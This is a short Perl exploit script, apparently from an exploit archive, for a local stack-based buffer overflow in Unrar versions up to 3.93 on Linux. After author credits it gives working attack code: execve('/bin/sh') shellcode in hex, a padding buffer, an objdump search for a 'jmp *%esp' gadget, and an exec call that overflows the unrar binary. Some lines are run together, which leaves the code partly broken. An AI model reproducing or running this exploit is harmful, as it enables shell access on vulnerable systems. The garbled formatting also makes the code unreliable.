#!/usr/bin/perl=head1 TITLE
Winrar <= v3.93 Local Stack-based Overflow exploit
=head2 DESCRIPTION
This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor.
It was not developped to bypass non-executing stack patches.
Have phun
=head2 AUTHORS
ZadYree ~~ 3LRVS Team - Low Level Languages Reversing Vxing Security
=head2 Tested ON
Linux Debian 6. May work on FreeBSD.
=head3 THANKS
kmkz
regol
hellpast
Hebiko
m_101
ZadYree
SNCF
The one who sent me that locked .rar
=cut
use 5.010;# Shellcode: execve("/bin/sh") => http://www.shell-storm.org/shellcode/files/shellcode-752.php
use constant SHELLCODE =>"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"."\x73\x68\x68\x2f\x62\x69\x6e\x89"."\xe3\xb0\x0b\xcd\x80";
use constant BUFF =>('-'.('3lrvs' x 820));##$pname="/usr/bin/unrar";
die "[-]File $pname does not exist!\012" unless (-e $pname);
say "[*]Looking for jmp *%esp gadget...";for my $line(qx{objdump -D$pname|grep"ff e4"}){$esp="0".$1, last if($line=~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});}
say '[+]Jump to $esp found! (0x', $esp, ")\012[+]Now exploiting...";
sleep(1);
my @payload =($pname, (BUFF . pack("V", hex($esp)). SHELLCODE ."\012"));
exec(@payload);
